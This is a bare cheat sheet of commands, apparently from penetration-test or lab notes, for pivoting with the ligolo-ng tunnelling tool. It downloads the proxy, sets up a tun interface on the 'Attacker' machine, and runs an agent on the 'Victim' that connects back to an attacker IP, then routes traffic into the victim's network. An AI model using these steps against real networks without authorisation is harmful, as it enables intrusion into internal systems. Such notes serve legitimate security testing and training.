wget -O proxy.tar.gz https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.3/ligolo-ng_proxy_0.8.3_linux_amd64.tar.gz
tar -xvf proxy.tar.gz
wget -O proxy.zip https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.3/ligolo-ng_proxy_0.8.3_windows_amd64.zip
Expand-Archive -Path .\proxy.zip -DestinationPath .\
Attacker:
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
Victim:
./agent -ignore-cert -connect 10.10.14.78:11601
Attacker (Ligolo):
session
1
ifconfig
Attacker:
sudo ip route add <IP CIDR> dev ligolo
Start the tunnel:
Attacker (Ligolo):
start